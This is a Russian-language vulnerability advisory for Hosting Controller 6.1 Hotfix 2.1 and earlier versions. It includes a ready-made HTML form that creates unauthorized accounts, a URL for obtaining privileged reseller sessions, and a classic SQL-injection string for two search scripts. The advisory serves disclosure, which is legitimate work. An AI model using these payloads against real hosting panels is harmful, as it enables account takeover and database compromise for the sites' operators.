Программа: Hosting Controller 6.1 Hotfix 2.1 и более ранние версии 

Обнаруженные уязвимости позволяют удаленному авторизованному пользователю обойти ограничения безопасности и выполнить произвольные SQL команды в базе данных приложения. 

1. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении. 

Пример:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"
method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 

2. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL:

http://[target]/admin/hosting/dsp_newreseller.asp 

3. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

'or'1'='1'or'1'='1

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии